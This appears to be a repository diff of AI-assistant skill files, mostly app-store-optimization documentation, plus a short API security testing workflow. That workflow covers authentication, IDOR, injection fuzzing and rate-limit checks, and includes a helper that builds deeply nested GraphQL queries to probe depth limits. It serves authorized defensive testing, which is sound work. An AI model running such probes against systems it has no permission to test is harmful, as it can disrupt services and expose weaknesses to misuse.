- [OWASP API Security Top 10](https://owasp.org/www-project-api-security/)
- [JWT Best Practices](https://tools.ietf.org/html/rfc8725)
- [Express Security Best Practices](https://expressjs.com/en/advanced/best-practice-security.html)
- [Node.js Security Checklist](https://blog.risingstack.com/node-js-security-checklist/)
- [API Security Checklist](https://github.com/shieldfy/API-Security-Checklist)

---

**Pro Tip:** Security is not a one-time task - regularly audit your APIs, keep dependencies updated, and stay informed about new vulnerabilities!
171
packages/llm/skills/api-security-testing/SKILL.md
Normal file
@ -0,0 +1,171 @@
---
name: api-security-testing
description: "API security testing workflow for REST and GraphQL APIs covering authentication, authorization, rate limiting, input validation, and security best practices."
category: granular-workflow-bundle
risk: safe
source: personal
date_added: "2026-02-27"
---

# API Security Testing Workflow

## Overview

Specialized workflow for testing REST and GraphQL API security including authentication, authorization, rate limiting, input validation, and API-specific vulnerabilities.

## When to Use This Workflow

Use this workflow when:
- Testing REST API security
- Assessing GraphQL endpoints
- Validating API authentication
- Testing API rate limiting
- Bug bounty API testing

## Workflow Phases

### Phase 1: API Discovery

#### Skills to Invoke
- `api-fuzzing-bug-bounty` - API fuzzing
- `scanning-tools` - API scanning

#### Actions
1. Enumerate endpoints
2. Document API methods
3. Identify parameters
4. Map data flows
5. Review documentation

#### Copy-Paste Prompts
```
Use @api-fuzzing-bug-bounty to discover API endpoints
```

### Phase 2: Authentication Testing

#### Skills to Invoke
- `broken-authentication` - Auth testing
- `api-security-best-practices` - API auth

#### Actions
1. Test API key validation
2. Test JWT tokens
3. Test OAuth2 flows
4. Test token expiration
5. Test refresh tokens

#### Copy-Paste Prompts
```
Use @broken-authentication to test API authentication
```

### Phase 3: Authorization Testing

#### Skills to Invoke
- `idor-testing` - IDOR testing

#### Actions
1. Test object-level authorization
2. Test function-level authorization
3. Test role-based access
4. Test privilege escalation
5. Test multi-tenant isolation

#### Copy-Paste Prompts
```
Use @idor-testing to test API authorization
```

### Phase 4: Input Validation

#### Skills to Invoke
- `api-fuzzing-bug-bounty` - API fuzzing
- `sql-injection-testing` - Injection testing

#### Actions
1. Test parameter validation
2. Test SQL injection
3. Test NoSQL injection
4. Test command injection
5. Test XXE injection

#### Copy-Paste Prompts
```
Use @api-fuzzing-bug-bounty to fuzz API parameters
```

### Phase 5: Rate Limiting

#### Skills to Invoke
- `api-security-best-practices` - Rate limiting

#### Actions
1. Test rate limit headers
2. Test brute force protection
3. Test resource exhaustion
4. Test bypass techniques
5. Document limitations

#### Copy-Paste Prompts
```
Use @api-security-best-practices to test rate limiting
```
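For step 1 above, a small helper can turn probe responses into findings. This is a sketch; header names vary by API, so both the legacy `X-RateLimit-*` names and the draft-standard `RateLimit-*` names are checked:

```javascript
// Interpret rate-limit headers captured from a probe response
// (headers object keyed by name; lookup is case-tolerant).
function parseRateLimitHeaders(headers) {
  const get = (name) => headers[name] ?? headers[name.toLowerCase()];
  const limit = get('X-RateLimit-Limit') ?? get('RateLimit-Limit');
  const remaining = get('X-RateLimit-Remaining') ?? get('RateLimit-Remaining');
  const retryAfter = get('Retry-After');
  return {
    advertised: limit !== undefined,   // does the API disclose its limit at all?
    exhausted: remaining !== undefined && Number(remaining) === 0,
    backoffSeconds: retryAfter !== undefined ? Number(retryAfter) : null,
  };
}
```

An API that advertises no limit headers at all is itself a finding worth documenting in step 5.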

### Phase 6: GraphQL Testing

#### Skills to Invoke
- `api-fuzzing-bug-bounty` - GraphQL fuzzing

#### Actions
1. Test introspection
2. Test query depth
3. Test query complexity
4. Test batch queries
5. Test field suggestions

#### Copy-Paste Prompts
```
Use @api-fuzzing-bug-bounty to test GraphQL security
```
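Step 2 (query depth) needs queries of controlled nesting. A tiny generator makes that repeatable; the field names `user` and `friends` here are placeholders to be swapped for real schema fields:

```javascript
// Build an intentionally deep GraphQL query to probe depth limits.
// deepQuery(0) is the flat baseline; raise depth until the server rejects it.
function deepQuery(depth) {
  let inner = 'id';
  for (let i = 0; i < depth; i++) {
    inner = `friends { ${inner} }`; // wrap one more nesting level
  }
  return `query { user { ${inner} } }`;
}
```

Binary-searching on `depth` gives you the server's effective depth limit (or shows there is none) for the report.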

### Phase 7: Error Handling

#### Skills to Invoke
- `api-security-best-practices` - Error handling

#### Actions
1. Test error messages
2. Check information disclosure
3. Test stack traces
4. Verify logging
5. Document findings

#### Copy-Paste Prompts
```
Use @api-security-best-practices to audit API error handling
```

## API Security Checklist

- [ ] Authentication working
- [ ] Authorization enforced
- [ ] Input validated
- [ ] Rate limiting active
- [ ] Errors sanitized
- [ ] Logging enabled
- [ ] CORS configured
- [ ] HTTPS enforced

## Quality Gates

- [ ] All endpoints tested
- [ ] Vulnerabilities documented
- [ ] Remediation provided
- [ ] Report generated

## Related Workflow Bundles

- `security-audit` - Security auditing
- `web-security-testing` - Web security
- `api-development` - API development
281
packages/llm/skills/app-store-optimization/HOW_TO_USE.md
Normal file
@ -0,0 +1,281 @@

# How to Use the App Store Optimization Skill

Hey Claude—I just added the "app-store-optimization" skill. Can you help me optimize my app's presence on the App Store and Google Play?

## Example Invocations

### Keyword Research

**Example 1: Basic Keyword Research**
```
Hey Claude—I just added the "app-store-optimization" skill. Can you research the best keywords for my productivity app? I'm targeting professionals who need task management and team collaboration features.
```

**Example 2: Competitive Keyword Analysis**
```
Hey Claude—I just added the "app-store-optimization" skill. Can you analyze keywords that Todoist, Asana, and Monday.com are using? I want to find gaps and opportunities for my project management app.
```

### Metadata Optimization

**Example 3: Optimize App Title**
```
Hey Claude—I just added the "app-store-optimization" skill. Can you optimize my app title for the Apple App Store? My app is called "TaskFlow" and I want to rank for "task manager", "productivity", and "team collaboration". The title needs to be under 30 characters.
```

**Example 4: Full Metadata Package**
```
Hey Claude—I just added the "app-store-optimization" skill. Can you create optimized metadata for both Apple App Store and Google Play Store? Here's my app info:
- Name: TaskFlow
- Category: Productivity
- Key features: AI task prioritization, team collaboration, calendar integration
- Target keywords: task manager, productivity app, team tasks
```

### Competitor Analysis

**Example 5: Analyze Top Competitors**
```
Hey Claude—I just added the "app-store-optimization" skill. Can you analyze the ASO strategies of the top 5 productivity apps in the App Store? I want to understand their title strategies, keyword usage, and visual asset approaches.
```

**Example 6: Identify Competitive Gaps**
```
Hey Claude—I just added the "app-store-optimization" skill. Can you compare my app's ASO performance against competitors and identify what I'm missing? Here's my current metadata: [paste metadata]
```

### ASO Score Calculation

**Example 7: Calculate Overall ASO Health**
```
Hey Claude—I just added the "app-store-optimization" skill. Can you calculate my app's ASO health score? Here are my metrics:
- Average rating: 4.2 stars
- Total ratings: 3,500
- Keywords in top 10: 3
- Keywords in top 50: 12
- Conversion rate: 4.5%
```

**Example 8: Identify Improvement Areas**
```
Hey Claude—I just added the "app-store-optimization" skill. My ASO score is 62/100. Can you tell me which areas I should focus on first to improve my rankings and downloads?
```

### A/B Testing

**Example 9: Plan Icon Test**
```
Hey Claude—I just added the "app-store-optimization" skill. I want to A/B test two different app icons. My current conversion rate is 5%. Can you help me plan the test, calculate required sample size, and determine how long to run it?
```

**Example 10: Analyze Test Results**
```
Hey Claude—I just added the "app-store-optimization" skill. Can you analyze my A/B test results?
- Variant A (control): 2,500 visitors, 125 installs
- Variant B (new icon): 2,500 visitors, 150 installs
Is this statistically significant? Should I implement variant B?
```

### Localization

**Example 11: Plan Localization Strategy**
```
Hey Claude—I just added the "app-store-optimization" skill. I currently only have English metadata. Which markets should I localize for first? I'm a bootstrapped startup with moderate budget.
```

**Example 12: Translate Metadata**
```
Hey Claude—I just added the "app-store-optimization" skill. Can you help me translate my app metadata to Spanish for the Mexico market? Here's my English metadata: [paste metadata]. Check if it fits within character limits.
```

### Review Analysis

**Example 13: Analyze User Reviews**
```
Hey Claude—I just added the "app-store-optimization" skill. Can you analyze my recent reviews and tell me:
- Overall sentiment (positive/negative ratio)
- Most common complaints
- Most requested features
- Bugs that need immediate fixing
```

**Example 14: Generate Review Response Templates**
```
Hey Claude—I just added the "app-store-optimization" skill. Can you create professional response templates for:
- Users reporting crashes
- Feature requests
- Positive 5-star reviews
- General complaints
```

### Launch Planning

**Example 15: Pre-Launch Checklist**
```
Hey Claude—I just added the "app-store-optimization" skill. Can you generate a comprehensive pre-launch checklist for both Apple App Store and Google Play Store? My launch date is December 1, 2025.
```

**Example 16: Optimize Launch Timing**
```
Hey Claude—I just added the "app-store-optimization" skill. What's the best day and time to launch my fitness app? I want to maximize visibility and downloads in the first week.
```

**Example 17: Plan Seasonal Campaign**
```
Hey Claude—I just added the "app-store-optimization" skill. Can you identify seasonal opportunities for my fitness app? It's currently October—what campaigns should I run for the next 6 months?
```

## What to Provide

### For Keyword Research
- App name and category
- Target audience description
- Key features and unique value proposition
- Competitor apps (optional)
- Geographic markets to target

### For Metadata Optimization
- Current app name
- Platform (Apple, Google, or both)
- Target keywords (prioritized list)
- Key features and benefits
- Target audience
- Current metadata (for optimization)

### For Competitor Analysis
- Your app category
- List of competitor app names or IDs
- Platform (Apple or Google)
- Specific aspects to analyze (keywords, visuals, ratings)

### For ASO Score Calculation
- Metadata quality metrics (title length, description length, keyword density)
- Rating data (average rating, total ratings, recent ratings)
- Keyword rankings (top 10, top 50, top 100 counts)
- Conversion metrics (impression-to-install rate, downloads)

### For A/B Testing
- Test type (icon, screenshot, title, description)
- Control variant details
- Test variant details
- Baseline conversion rate
- For results analysis: visitor and conversion counts for both variants

### For Localization
- Current market and language
- Budget level (low, medium, high)
- Target number of markets
- Current metadata text for translation

### For Review Analysis
- Recent reviews (text, rating, date)
- Platform (Apple or Google)
- Time period to analyze
- Specific focus (bugs, features, sentiment)

### For Launch Planning
- Platform (Apple, Google, or both)
- Target launch date
- App category
- App information (name, features, target audience)

## What You'll Get

### Keyword Research Output
- Prioritized keyword list with search volume estimates
- Competition level analysis
- Relevance scores
- Long-tail keyword opportunities
- Strategic recommendations

### Metadata Optimization Output
- Optimized titles (multiple options)
- Optimized descriptions (short and full)
- Keyword field optimization (Apple)
- Character count validation
- Keyword density analysis
- Before/after comparison

### Competitor Analysis Output
- Ranked competitors by ASO strength
- Common keyword patterns
- Keyword gaps and opportunities
- Visual asset assessment
- Best practices identified
- Actionable recommendations

### ASO Score Output
- Overall score (0-100)
- Breakdown by category (metadata, ratings, keywords, conversion)
- Strengths and weaknesses
- Prioritized action items
- Expected impact of improvements

### A/B Test Output
- Test design with hypothesis
- Required sample size calculation
- Duration estimates
- Statistical significance analysis
- Implementation recommendations
- Learnings and insights

### Localization Output
- Prioritized target markets
- Estimated translation costs
- ROI projections
- Character limit validation for each language
- Cultural adaptation recommendations
- Phased implementation plan

### Review Analysis Output
- Sentiment distribution (positive/neutral/negative)
- Common themes and topics
- Top issues requiring fixes
- Most requested features
- Response templates
- Trend analysis over time

### Launch Planning Output
- Platform-specific checklists (Apple, Google, Universal)
- Timeline with milestones
- Compliance validation
- Optimal launch timing recommendations
- Seasonal campaign opportunities
- Update cadence planning

## Tips for Best Results

1. **Be Specific**: Provide as much detail about your app as possible
2. **Include Context**: Share your goals (increase downloads, improve ranking, boost conversion)
3. **Provide Data**: Real metrics enable more accurate analysis
4. **Iterate**: Start with keyword research, then optimize metadata, then test
5. **Track Results**: Monitor changes after implementing recommendations
6. **Stay Compliant**: Always verify recommendations against current App Store/Play Store guidelines
7. **Test First**: Use A/B testing before making major metadata changes
8. **Localize Strategically**: Start with highest-ROI markets first
9. **Respond to Reviews**: Use provided templates to engage with users
10. **Plan Ahead**: Use launch checklists and timelines to avoid last-minute rushes

## Common Workflows

### New App Launch
1. Keyword research → Competitor analysis → Metadata optimization → Pre-launch checklist → Launch timing optimization

### Improving Existing App
1. ASO score calculation → Identify gaps → Metadata optimization → A/B testing → Review analysis → Implement changes

### International Expansion
1. Localization planning → Market prioritization → Metadata translation → ROI analysis → Phased rollout

### Ongoing Optimization
1. Monthly keyword ranking tracking → Quarterly metadata updates → Continuous A/B testing → Review monitoring → Seasonal campaigns

## Need Help?

If you need clarification on any aspect of ASO or want to combine multiple analyses, just ask! For example:

```
Hey Claude—I just added the "app-store-optimization" skill. Can you create a complete ASO strategy for my new productivity app? I need keyword research, optimized metadata for both stores, a pre-launch checklist, and launch timing recommendations.
```

The skill can handle comprehensive, multi-phase ASO projects as well as specific tactical optimizations.
430
packages/llm/skills/app-store-optimization/README.md
Normal file
@ -0,0 +1,430 @@

# App Store Optimization (ASO) Skill

**Version**: 1.0.0
**Last Updated**: November 7, 2025
**Author**: Claude Skills Factory

## Overview

A comprehensive App Store Optimization (ASO) skill that provides complete capabilities for researching, optimizing, and tracking mobile app performance on the Apple App Store and Google Play Store. This skill empowers app developers and marketers to maximize their app's visibility, downloads, and success in competitive app marketplaces.

## What This Skill Does

This skill provides end-to-end ASO capabilities across seven key areas:

1. **Research & Analysis**: Keyword research, competitor analysis, market trends, review sentiment
2. **Metadata Optimization**: Title, description, keywords with platform-specific character limits
3. **Conversion Optimization**: A/B testing framework, visual asset optimization
4. **Rating & Review Management**: Sentiment analysis, response strategies, issue identification
5. **Launch & Update Strategies**: Pre-launch checklists, timing optimization, update planning
6. **Analytics & Tracking**: ASO scoring, keyword rankings, performance benchmarking
7. **Localization**: Multi-language strategy, translation management, ROI analysis

## Key Features

### Comprehensive Keyword Research
- Search volume and competition analysis
- Long-tail keyword discovery
- Competitor keyword extraction
- Keyword difficulty scoring
- Strategic prioritization

### Platform-Specific Metadata Optimization
- **Apple App Store**:
  - Title (30 chars)
  - Subtitle (30 chars)
  - Promotional Text (170 chars)
  - Description (4000 chars)
  - Keywords field (100 chars)
- **Google Play Store**:
  - Title (50 chars)
  - Short Description (80 chars)
  - Full Description (4000 chars)
- Character limit validation
- Keyword density analysis
- Multiple optimization strategies
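The platform limits above are mechanical enough to sketch as a validator. The skill's modules are Python; this JavaScript sketch only illustrates the check, and the function name and field keys are assumptions, not the module's API:

```javascript
// Character limits taken from the platform lists above.
const LIMITS = {
  apple: { title: 30, subtitle: 30, promotional_text: 170, description: 4000, keywords: 100 },
  google: { title: 50, short_description: 80, full_description: 4000 },
};

// Return every metadata field that exceeds its platform limit.
function validateCharacterLimits(platform, metadata) {
  const limits = LIMITS[platform];
  const violations = [];
  for (const [field, text] of Object.entries(metadata)) {
    const max = limits[field];
    if (max !== undefined && text.length > max) {
      violations.push({ field, length: text.length, max });
    }
  }
  return violations; // empty array means everything fits
}
```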

### Competitor Intelligence
- Automated competitor discovery
- Metadata strategy analysis
- Visual asset assessment
- Gap identification
- Competitive positioning

### ASO Health Scoring
- 0-100 overall score
- Four-category breakdown (Metadata, Ratings, Keywords, Conversion)
- Strengths and weaknesses identification
- Prioritized action recommendations
- Expected impact estimates

### Scientific A/B Testing
- Test design and hypothesis formulation
- Sample size calculation
- Statistical significance analysis
- Duration estimation
- Implementation recommendations

### Global Localization
- Market prioritization (Tier 1/2/3)
- Translation cost estimation
- Character limit adaptation by language
- Cultural keyword considerations
- ROI analysis

### Review Intelligence
- Sentiment analysis
- Common theme extraction
- Bug and issue identification
- Feature request clustering
- Professional response templates

### Launch Planning
- Platform-specific checklists
- Timeline generation
- Compliance validation
- Optimal timing recommendations
- Seasonal campaign planning

## Python Modules

This skill includes 8 powerful Python modules:

### 1. keyword_analyzer.py
**Purpose**: Analyzes keywords for search volume, competition, and relevance

**Key Functions**:
- `analyze_keyword()`: Single keyword analysis
- `compare_keywords()`: Multi-keyword comparison and ranking
- `find_long_tail_opportunities()`: Generate long-tail variations
- `calculate_keyword_density()`: Analyze keyword usage in text
- `extract_keywords_from_text()`: Extract keywords from reviews/descriptions
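`calculate_keyword_density()` lives in Python inside the module, but the underlying calculation is simple enough to sketch. Shown here in JavaScript for illustration; the real function's signature and normalization may differ:

```javascript
// Fraction of the text's words accounted for by occurrences of the keyword
// (supports multi-word keywords by matching consecutive word sequences).
function keywordDensity(text, keyword) {
  const words = text.toLowerCase().split(/\s+/).filter(Boolean);
  const kw = keyword.toLowerCase().split(/\s+/);
  let hits = 0;
  for (let i = 0; i + kw.length <= words.length; i++) {
    if (kw.every((w, j) => words[i + j] === w)) hits++;
  }
  return words.length ? (hits * kw.length) / words.length : 0;
}
```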

### 2. metadata_optimizer.py
**Purpose**: Optimizes titles, descriptions, keywords with character limit validation

**Key Functions**:
- `optimize_title()`: Generate optimal title options
- `optimize_description()`: Create conversion-focused descriptions
- `optimize_keyword_field()`: Maximize Apple's 100-char keyword field
- `validate_character_limits()`: Ensure platform compliance
- `calculate_keyword_density()`: Analyze keyword integration

### 3. competitor_analyzer.py
**Purpose**: Analyzes competitor ASO strategies

**Key Functions**:
- `analyze_competitor()`: Single competitor deep-dive
- `compare_competitors()`: Multi-competitor analysis
- `identify_gaps()`: Find competitive opportunities
- `_calculate_competitive_strength()`: Score competitor ASO quality

### 4. aso_scorer.py
**Purpose**: Calculates comprehensive ASO health score

**Key Functions**:
- `calculate_overall_score()`: 0-100 ASO health score
- `score_metadata_quality()`: Evaluate metadata optimization
- `score_ratings_reviews()`: Assess rating quality and volume
- `score_keyword_performance()`: Analyze ranking positions
- `score_conversion_metrics()`: Evaluate conversion rates
- `generate_recommendations()`: Prioritized improvement actions
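Conceptually, `calculate_overall_score()` blends the four category scores into the 0-100 figure. Sketched in JavaScript for illustration; the weights below are assumptions, not the module's actual values:

```javascript
// Weighted blend of the four 0-100 category scores.
// Weights are illustrative assumptions, not aso_scorer.py's real constants.
function overallAsoScore({ metadata, ratings, keywords, conversion }) {
  const weights = { metadata: 0.3, ratings: 0.25, keywords: 0.25, conversion: 0.2 };
  const score =
    metadata * weights.metadata +
    ratings * weights.ratings +
    keywords * weights.keywords +
    conversion * weights.conversion;
  return Math.round(score); // 0-100 overall score
}
```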

### 5. ab_test_planner.py
**Purpose**: Plans and tracks A/B tests for ASO elements

**Key Functions**:
- `design_test()`: Create test hypothesis and structure
- `calculate_sample_size()`: Determine required visitors
- `calculate_significance()`: Assess statistical validity
- `track_test_results()`: Monitor ongoing tests
- `generate_test_report()`: Create comprehensive test reports
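At its core, `calculate_significance()` is a two-proportion z-test. The same calculation sketched in JavaScript for illustration (not the module's actual signature):

```javascript
// Two-proportion z-test on conversion rates of variants A and B.
function abSignificance(visitorsA, conversionsA, visitorsB, conversionsB) {
  const pA = conversionsA / visitorsA;
  const pB = conversionsB / visitorsB;
  // pooled conversion rate under the null hypothesis (no difference)
  const pPool = (conversionsA + conversionsB) / (visitorsA + visitorsB);
  const se = Math.sqrt(pPool * (1 - pPool) * (1 / visitorsA + 1 / visitorsB));
  const z = (pB - pA) / se;
  return { z, significant: Math.abs(z) >= 1.96 }; // 1.96 ~ 95% confidence
}
```

With the Example 10 numbers from HOW_TO_USE.md (2,500 visitors/125 installs vs 2,500/150), z comes out around 1.55, short of the 1.96 threshold, so that lift would not yet be significant at 95%.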

### 6. localization_helper.py
**Purpose**: Manages multi-language ASO optimization

**Key Functions**:
- `identify_target_markets()`: Prioritize localization markets
- `translate_metadata()`: Adapt metadata for languages
- `adapt_keywords()`: Cultural keyword adaptation
- `validate_translations()`: Character limit validation
- `calculate_localization_roi()`: Estimate investment returns

### 7. review_analyzer.py
**Purpose**: Analyzes user reviews for actionable insights

**Key Functions**:
- `analyze_sentiment()`: Calculate sentiment distribution
- `extract_common_themes()`: Identify frequent topics
- `identify_issues()`: Surface bugs and problems
- `find_feature_requests()`: Extract desired features
- `track_sentiment_trends()`: Monitor changes over time
- `generate_response_templates()`: Create review responses

### 8. launch_checklist.py
**Purpose**: Generates comprehensive launch and update checklists

**Key Functions**:
- `generate_prelaunch_checklist()`: Complete submission validation
- `validate_app_store_compliance()`: Check guidelines compliance
- `create_update_plan()`: Plan update cadence
- `optimize_launch_timing()`: Recommend launch dates
- `plan_seasonal_campaigns()`: Identify seasonal opportunities
|
||||
|
||||
## Installation

### For Claude Code (Desktop/CLI)

#### Project-Level Installation

```bash
# Copy skill folder to project
cp -r app-store-optimization /path/to/your/project/.claude/skills/

# Claude will auto-load the skill when working in this project
```

#### User-Level Installation (Available in All Projects)

```bash
# Copy skill folder to user-level skills
cp -r app-store-optimization ~/.claude/skills/

# Claude will load this skill in all your projects
```

### For Claude Apps (Browser)

1. Use the `skill-creator` skill to import the skill
2. Or import it manually via the Claude Apps interface

### Verification

To verify installation:

```bash
# Check if skill folder exists
ls ~/.claude/skills/app-store-optimization/

# You should see:
# SKILL.md
# keyword_analyzer.py
# metadata_optimizer.py
# competitor_analyzer.py
# aso_scorer.py
# ab_test_planner.py
# localization_helper.py
# review_analyzer.py
# launch_checklist.py
# sample_input.json
# expected_output.json
# HOW_TO_USE.md
# README.md
```

## Usage Examples

### Example 1: Complete Keyword Research

```
Hey Claude—I just added the "app-store-optimization" skill. Can you research keywords for my fitness app? I'm targeting people who want home workouts, yoga, and meal planning. Analyze top competitors like Nike Training Club and Peloton.
```

**What Claude will do**:
- Use `keyword_analyzer.py` to research keywords
- Use `competitor_analyzer.py` to analyze Nike Training Club and Peloton
- Provide a prioritized keyword list with search volumes and competition levels
- Identify gaps and long-tail opportunities
- Recommend primary keywords for the title and secondary keywords for the description

### Example 2: Optimize App Store Metadata

```
Hey Claude—I just added the "app-store-optimization" skill. Optimize my app's metadata for both Apple App Store and Google Play Store:
- App: FitFlow
- Category: Health & Fitness
- Features: AI workout plans, nutrition tracking, progress photos
- Keywords: fitness app, workout planner, home fitness
```

**What Claude will do**:
- Use `metadata_optimizer.py` to create optimized titles (multiple options)
- Generate platform-specific descriptions (short and full)
- Optimize Apple's 100-character keyword field
- Validate all character limits
- Calculate keyword density
- Provide a before/after comparison

### Example 3: Calculate ASO Health Score

```
Hey Claude—I just added the "app-store-optimization" skill. Calculate my app's ASO score:
- Average rating: 4.3 stars (8,200 ratings)
- Keywords in top 10: 4
- Keywords in top 50: 15
- Conversion rate: 3.8%
- Title: "FitFlow - Home Workouts"
- Description: 1,500 characters with 3 keyword mentions
```

**What Claude will do**:
- Use `aso_scorer.py` to calculate overall score (0-100)
- Break down by category (Metadata: X/25, Ratings: X/25, Keywords: X/25, Conversion: X/25)
- Identify strengths and weaknesses
- Generate prioritized recommendations
- Estimate impact of improvements

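A toy version of this four-category breakdown can be computed directly. The sketch below assumes a simple weighted rubric; the `score_aso` helper and every weight in it are illustrative assumptions, not the actual formula inside `aso_scorer.py`:

```python
import math

def score_aso(avg_rating, total_ratings, top10_keywords, top50_keywords,
              conversion_rate, keyword_mentions):
    """Toy ASO score: four categories, each capped at 25 points (assumed weights)."""
    # Ratings: reward both quality (stars) and volume (log-scaled count)
    ratings = min(25, avg_rating / 5 * 15
                  + min(10, math.log10(max(total_ratings, 1)) * 2.5))
    # Keywords: top-10 rankings are worth more than top-50
    keywords = min(25, top10_keywords * 3 + top50_keywords * 0.7)
    # Conversion: treat a 5% impression-to-install rate as a "perfect" 25
    conversion = min(25, conversion_rate / 0.05 * 25)
    # Metadata: crude proxy based on keyword usage in the description
    metadata = min(25, 10 + keyword_mentions * 3)
    return {'ratings': round(ratings, 1), 'keywords': round(keywords, 1),
            'conversion': round(conversion, 1), 'metadata': round(metadata, 1),
            'total': round(ratings + keywords + conversion + metadata, 1)}

# The numbers from this example
breakdown = score_aso(avg_rating=4.3, total_ratings=8200, top10_keywords=4,
                      top50_keywords=15, conversion_rate=0.038, keyword_mentions=3)
print(breakdown)
```

With this rubric the example app lands in the low 80s out of 100, with conversion and metadata as the weakest categories — exactly the kind of breakdown the bullet list above describes.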
### Example 4: A/B Test Planning

```
Hey Claude—I just added the "app-store-optimization" skill. I want to A/B test my app icon. My current conversion rate is 4.2%. How many visitors do I need and how long should I run the test?
```

**What Claude will do**:
- Use `ab_test_planner.py` to design the test
- Calculate required sample size (based on minimum detectable effect)
- Estimate test duration for low/medium/high traffic scenarios
- Provide test structure and success metrics
- Explain how to analyze results

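The "how many visitors" question is a standard two-proportion power calculation, which is also the approach `ab_test_planner.py` takes. A stand-alone sketch using only the standard library (the function name and its defaults are illustrative):

```python
from statistics import NormalDist

def required_sample_size(baseline, lift, confidence=0.90, power=0.80):
    """Visitors needed per variant to detect a relative `lift` over `baseline`."""
    p1, p2 = baseline, baseline * (1 + lift)
    z_alpha = NormalDist().inv_cdf(1 - (1 - confidence) / 2)  # two-tailed
    z_beta = NormalDist().inv_cdf(power)
    p_bar = (p1 + p2) / 2
    variance = 2 * p_bar * (1 - p_bar)  # pooled variance of the difference
    n = ((z_alpha + z_beta) ** 2 * variance) / ((p2 - p1) ** 2)
    return int(n) + 1

# 4.2% baseline conversion, aiming to detect a 10% relative improvement
per_variant = required_sample_size(0.042, 0.10)
print(per_variant, "visitors per variant,", per_variant * 2, "total")
```

For a 4.2% baseline this comes out to roughly 30,000 visitors per variant at 90% confidence and 80% power, which is why the skill estimates duration separately for low-, medium-, and high-traffic apps.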
### Example 5: Review Sentiment Analysis

```
Hey Claude—I just added the "app-store-optimization" skill. Analyze my last 500 reviews and tell me:
- Overall sentiment
- Most common complaints
- Top feature requests
- Bugs needing immediate fixes
```

**What Claude will do**:
- Use `review_analyzer.py` to process reviews
- Calculate sentiment distribution
- Extract common themes
- Identify and prioritize issues
- Cluster feature requests
- Generate response templates

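The sentiment-distribution step can be sketched with simple keyword-set matching. This is a heavily simplified illustration — the word lists and the `sentiment_distribution` helper are assumptions, not what `review_analyzer.py` actually ships:

```python
from collections import Counter

# Illustrative keyword sets; a real analyzer would use far richer signals
POSITIVE = {'love', 'great', 'awesome', 'helpful', 'easy'}
NEGATIVE = {'crash', 'bug', 'slow', 'broken', 'expensive'}

def sentiment_distribution(reviews):
    """Classify each review by counting positive vs. negative keywords."""
    tally = Counter()
    for text in reviews:
        words = set(text.lower().split())
        pos, neg = len(words & POSITIVE), len(words & NEGATIVE)
        label = 'positive' if pos > neg else 'negative' if neg > pos else 'neutral'
        tally[label] += 1
    total = sum(tally.values())
    return {label: round(count / total, 2) for label, count in tally.items()}

reviews = [
    "Love this app, great workouts",
    "Constant crash on startup, huge bug",
    "It tracks my meals",
]
print(sentiment_distribution(reviews))
```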
### Example 6: Pre-Launch Checklist

```
Hey Claude—I just added the "app-store-optimization" skill. Generate a complete pre-launch checklist for both app stores. My launch date is March 15, 2026.
```

**What Claude will do**:
- Use `launch_checklist.py` to generate checklists
- Create Apple App Store checklist (metadata, assets, technical, legal)
- Create Google Play Store checklist (metadata, assets, technical, legal)
- Add universal checklist (marketing, QA, support)
- Generate timeline with milestones
- Calculate completion percentage

## Best Practices

### Keyword Research
1. Start with 20-30 seed keywords
2. Analyze top 5 competitors in your category
3. Balance high-volume and long-tail keywords
4. Prioritize relevance over search volume
5. Update keyword research quarterly

### Metadata Optimization
1. Front-load keywords in the title (first 15 characters matter most)
2. Use every available character (don't waste space)
3. Write for humans first, search engines second
4. A/B test major changes before committing
5. Update descriptions with each major release

### A/B Testing
1. Test one element at a time (icon vs. screenshots vs. title)
2. Run tests to statistical significance (90%+ confidence)
3. Test high-impact elements first (icon has the biggest impact)
4. Allow sufficient duration (at least 1 week, preferably 2-3)
5. Document learnings for future tests

### Localization
1. Start with the top 5 revenue markets (US, China, Japan, Germany, UK)
2. Use professional translators, not machine translation
3. Test translations with native speakers
4. Adapt keywords for cultural context
5. Monitor ROI by market

### Review Management
1. Respond to reviews within 24-48 hours
2. Always be professional, even with negative reviews
3. Address specific issues raised
4. Thank users for positive feedback
5. Use insights to prioritize product improvements

## Technical Requirements

- **Python**: 3.7+ (for Python modules)
- **Platform Support**: Apple App Store, Google Play Store
- **Data Formats**: JSON input/output
- **Dependencies**: Standard library only (no external packages required)

## Limitations

### Data Dependencies
- Keyword search volumes are estimates (no official Apple/Google data)
- Competitor data limited to publicly available information
- Review analysis requires access to public reviews
- Historical data may not be available for new apps

### Platform Constraints
- Apple: Metadata changes require app submission (except Promotional Text)
- Google: Metadata changes take 1-2 hours to index
- A/B testing requires significant traffic for statistical significance
- Store algorithms are proprietary and change without notice

### Scope
- Does not include paid user acquisition (Apple Search Ads, Google Ads)
- Does not cover in-app analytics implementation
- Does not handle technical app development
- Focuses on organic discovery and conversion optimization

## Troubleshooting

### Issue: Python modules not found
**Solution**: Ensure all .py files are in the same directory as SKILL.md

### Issue: Character limit validation failing
**Solution**: Check that you're using the correct platform ('apple' or 'google')

### Issue: Keyword research returning limited results
**Solution**: Provide more context about your app, features, and target audience

### Issue: ASO score seems inaccurate
**Solution**: Ensure you're providing accurate metrics (ratings, keyword rankings, conversion rate)

## Version History

### Version 1.0.0 (November 7, 2025)
- Initial release
- 8 Python modules with comprehensive ASO capabilities
- Support for both Apple App Store and Google Play Store
- Keyword research, metadata optimization, competitor analysis
- ASO scoring, A/B testing, localization, review analysis
- Launch planning and seasonal campaign tools

## Support & Feedback

This skill is designed to help app developers and marketers succeed in competitive app marketplaces. For the best results:

1. Provide detailed context about your app
2. Include specific metrics when available
3. Ask follow-up questions for clarification
4. Iterate based on results

## Credits

Developed by Claude Skills Factory.
Based on industry-standard ASO best practices.
Platform requirements current as of November 2025.

## License

This skill is provided as-is for use with Claude Code and Claude Apps. Customize and extend as needed for your specific use cases.

---

**Ready to optimize your app?** Start with keyword research, then move to metadata optimization, and finally implement A/B testing for continuous improvement. The skill handles everything from pre-launch planning to ongoing optimization.

For detailed usage examples, see [HOW_TO_USE.md](HOW_TO_USE.md).
409
packages/llm/skills/app-store-optimization/SKILL.md
Normal file
@@ -0,0 +1,409 @@
---
name: app-store-optimization
description: "Complete App Store Optimization (ASO) toolkit for researching, optimizing, and tracking mobile app performance on Apple App Store and Google Play Store"
risk: unknown
source: community
date_added: "2026-02-27"
---

# App Store Optimization (ASO) Skill

This comprehensive skill provides complete ASO capabilities for successfully launching and optimizing mobile applications on the Apple App Store and Google Play Store.

## Capabilities

### Research & Analysis
- **Keyword Research**: Analyze keyword volume, competition, and relevance for app discovery
- **Competitor Analysis**: Deep-dive into top-performing apps in your category
